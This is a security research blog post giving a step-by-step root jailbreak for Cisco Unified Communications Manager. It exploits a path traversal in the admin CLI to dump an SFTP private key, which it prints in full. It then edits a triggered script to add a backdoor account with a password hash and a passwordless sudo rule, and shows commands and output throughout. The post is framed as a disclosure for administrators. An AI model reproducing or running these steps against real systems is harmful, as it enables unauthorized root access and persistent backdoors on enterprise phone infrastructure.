The Recurity Lablog

Gaining access to closed phone platforms in order to execute the rights the paying customer actually has on the device has become a necessary exercise lately. Very capable people perform this public service for certain consumer devices on the market. Unfortunately, the trend of sealing the operating system off from the legitimate administrator has found its way into enterprise phone solutions as well. Therefore, it becomes necessary to provide jail-breaking guides for those platforms as well, in order to allow the administrator to fix or adjust things on these platforms that the vendor did not implement to the customer's satisfaction.

The Cisco Unified Communication Manager, or CUCM, is such a closed platform. While the system's design separates the administration user of the web interface, which controls the VoIP specific functionality, from the operating system administrator, the later is confined in an IOS-like command line shell written in Java. This shell only offers a very small set of commands, barely sufficient to manage the appliance's functionality. The underlying operating system, a Red Hat Enterprise Linux AS release 4 (Nahant Update 4) in the case of CUCM 7.x, obviously offers a significantly broader spectrum of setup and administration choices. For example, it might be desirable to modify the iptables configuration in order to protect some of Cisco's less well implemented services from the casual attacker.

WARNING: The following information is provided as-is, for educational purposes only. Using this information against actual Cisco products may void your warranty, may not be legal and may cause you trouble and other unwanted effects. We neither recommend nor encourage any activity that is not compliant with laws and license agreements you may have. This guide is only provided for testing in lab environments.

So, without further ado, here we present one way to gain root access on a CUCM, provided a legitimate operating system administrator account is available:

1. Connect to the administrator CLI using SSH
2. Run the command file dump sftpdetails ../.ssh/id_dsa. This should give you the private key of the SFTP user:

   admin:file dump sftpdetails ../.ssh/id_dsa
   -----BEGIN DSA PRIVATE KEY-----
   MIIBvQIBAAKBgQDD4rRO0aI3VTsEYIo48zHDipw7AXR+QmEVsSevdtNNMmWbFeHl
   6aQF7VzwoLzfa1eVpXwGCbk7m1/u7wY/mJNsrClNaPWfa0MbNFPdOI0o4IUA+LNO
   +6GNbDbWMPAdiuV0S/fyg7wUc2DcKTZX6mQuWbGaGbLk2bN1RxkVzqi4vQIVAJaq
   saqLZ10dIsbfk04LaOgxgkZBAoGBAKGquSl92E/ZMmQI/SzhPO9p0uyfhZR8uR2M
   a3R60EP1HyTg+DO6M8REzOSm1PTWpvr0XFAQULfxGZQyjcARIYPmmBSrqz7ETS3y
   bmZcJ19a38H1L2EUuOCO8A3q70NK2DMPoYBf6JV+b77shpz7aE+1Xd0rL3Tyqtzj
   JOFsyxkSAoGBAKmWRxB/pwGtu1eFc5Eb5xCRmVB7JP9xDpqW/DIz2LTxoZBSMRcJ
   5UdZ7ewVGIXYOjKvcR/ua3n6UBa0wBmYuHJ5erjpAHoR0JUjfpz9ONiX47OAKDav
   fLD2lIqnxzUz+QmHUVRiwcjd2AZhyzfChS40/9tKbBaqC2QYki7NKyfzAhUAhuPE
   PSfhcQWR3rOKaYUD85henvE=
   -----END DSA PRIVATE KEY-----
   

3. Create a file on your local machine, containing the private key just obtained. We will use c:\temp\id.ots in this example.

   C:\>copy con c:\temp\id.ots
   -----BEGIN DSA PRIVATE KEY-----
   MIIBvQIBAAKBgQDD4rRO0aI3VTsEYIo48zHDipw7AXR+QmEVsSevdtNNMmWbFeHl
   6aQF7VzwoLzfa1eVpXwGCbk7m1/u7wY/mJNsrClNaPWfa0MbNFPdOI0o4IUA+LNO
   +6GNbDbWMPAdiuV0S/fyg7wUc2DcKTZX6mQuWbGaGbLk2bN1RxkVzqi4vQIVAJaq
   saqLZ10dIsbfk04LaOgxgkZBAoGBAKGquSl92E/ZMmQI/SzhPO9p0uyfhZR8uR2M
   a3R60EP1HyTg+DO6M8REzOSm1PTWpvr0XFAQULfxGZQyjcARIYPmmBSrqz7ETS3y
   bmZcJ19a38H1L2EUuOCO8A3q70NK2DMPoYBf6JV+b77shpz7aE+1Xd0rL3Tyqtzj
   JOFsyxkSAoGBAKmWRxB/pwGtu1eFc5Eb5xCRmVB7JP9xDpqW/DIz2LTxoZBSMRcJ
   5UdZ7ewVGIXYOjKvcR/ua3n6UBa0wBmYuHJ5erjpAHoR0JUjfpz9ONiX47OAKDav
   fLD2lIqnxzUz+QmHUVRiwcjd2AZhyzfChS40/9tKbBaqC2QYki7NKyfzAhUAhuPE
   PSfhcQWR3rOKaYUD85henvE=
   -----END DSA PRIVATE KEY-----
   ^Z
           1 file(s) copied.
   

4. If you are using PuTTY, you will have to change the key format from OpenSSH to PuTTY using:

   C:\>puttygen c:\TEMP\id.ots
   

   Save the private key (with or without passphrase) to another file, e.g. c:\temp\id.ppk.
5. Employ your favorite SFTP tool to connect as sftpuser to your CUCM. Here, we are using psftp.exe from the PuTTY team:

   C:\>psftp -2 -i c:\TEMP\id.ppk sftpuser@cucm.example.com
   Using username "sftpuser".
   Remote working directory is /home/sftpuser
   psftp>
   

6. Get the file sftp_connect.sh:

   psftp> get sftp_connect.sh
   remote:/home/sftpuser/sftp_connect.sh => local:sftp_connect.sh
   psftp> exit
   

7. You can open the file locally now in your favorite editor. Add the following lines after the first line. Make sure that your editor understands the difference between Windows and UNIX line endings! You can use UltraEdit for that task.

   chattr -i /etc/passwd
   chattr -i /etc/shadow
   echo 'jail:x:1337:1337::/tmp:/bin/bash' >> /etc/passwd
   echo 'jail:$1$knkuI5HP$sNn3SJJ/95E.9iD.vvnyw.:14714:1:99999:7:::' >> /etc/shadow
   echo 'jail ALL=(root) NOPASSWD: /bin/bash' >> /etc/sudoers
   chattr +i /etc/passwd
   chattr +i /etc/shadow
   

8. Now we connect using the sftpuser again and replace the file sftp_connect.sh:

   C:\TEMP\>psftp -2 -i c:\TEMP\id.ppk sftpuser@cucm.example.com
   Using username "sftpuser".
   Remote working directory is /home/sftpuser
   psftp> del sftp_connect.sh
   rm /home/sftpuser/sftp_connect.sh: OK
   psftp> put sftp_connect.sh
   local:sftp_connect.sh => remote:/home/sftpuser/sftp_connect.sh
   psftp> chmod 555 sftp_connect.sh
   /home/sftpuser/sftp_connect.sh: 0644 -> 0555
   psftp> exit
   

9. Back in the CUCM administrator CLI, we execute the command file get tftp os7920.txt to trigger our enhanced script. Yes, the command line says TFTP, not SFTP, that's correct. Never mind. It doesn't actually matter what you answer to the CLI questions, as long as the file (e.g. os7920.txt) exists and you answer y to the first question.

   admin:file get tftp os7920.txt
   Please wait while the system is gathering files info ...done.
   Sub-directories were not traversed.
   Number of files affected: 1
   Total size in Bytes: 22
   Total size in Kbytes: 0.021484375
   Would you like to proceed [y/n]? y
   SFTP server IP: doesNotMatter
   SFTP server port [22]:
   User ID: SoonToBeRoot
   Password: ***
   
   Download directory: InYourFace
   
   Could not connect to host doesNotMatter on port 22. Please verify SFTP settings.
   admin:
   

10. Finally, you can connect to your CUCM using SSH, the user name jail and the password break and elevate your privileges by using sudo /bin/bash:

    login as: jail
    jail@cucm.example.com's password:
    
    -bash-3.00$ sudo /bin/bash
    bash-3.00# id
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
    bash-3.00#
    

From this point on, it is assumed that you know what you do. Otherwise, it is not advisable to follow this procedure anyway. The first action should probably be reverting the changes you have made to /home/sftpuser/sftp_connect.sh. The second action we may suggest is renaming the script /usr/local/platform/cli_scripts/sftp_file_commands.sh to something else. You should also change the password of the user jail.

This procedure was brought to you by Sandro Gauci of EnableSecurity and Felix 'FX' Lindner of Recurity Labs.